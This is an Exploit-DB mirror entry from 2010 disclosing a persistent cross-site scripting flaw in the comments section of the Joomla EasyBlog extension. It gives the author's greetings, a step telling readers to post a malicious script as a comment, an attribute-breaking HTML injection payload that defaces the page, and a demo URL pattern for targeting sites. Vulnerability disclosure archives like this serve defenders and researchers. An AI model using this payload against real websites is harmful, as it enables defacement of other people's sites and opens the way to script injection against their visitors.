exploit-db-mirror/exploits/php/webapps/14336.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

20 lines
No EOL
1.1 KiB
Text

Name : Joomla EasyBlog Persistent XSS Vulnerability
Date : july 12,2010
Critical Level : HIGH
vendor URL :http://stackideas.com/products/easyblog.html
Author : Sid3^effects aKa HaRi
special thanks to : r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,gunslinger_
greetz to :www.topsecure.net ,All ICW members and my friends :) luv y0 guyz
#######################################################################################################
Description
Publishing your blog in Joomla!-based website has never been easier with EasyBlog. Comes with built-in social integrations with Twitter, Facebook Share and Google Buzz, you never, ever have to manually notify your followers for your new blog entries.
#######################################################################################################
Xploit: Persistent XSS Vulnerability
This vulnerability exists in the comments section.
1. Goto any post and submit your evil xss script in the comment section :P
Attack Pattern:">><marquee><h1>XSS3d by Sid3^effects</h1><marquee>
DEMO URL : http://<site>/easyblog/entry/uncategorized/2010/07/09/testing-umlaut-charaters.html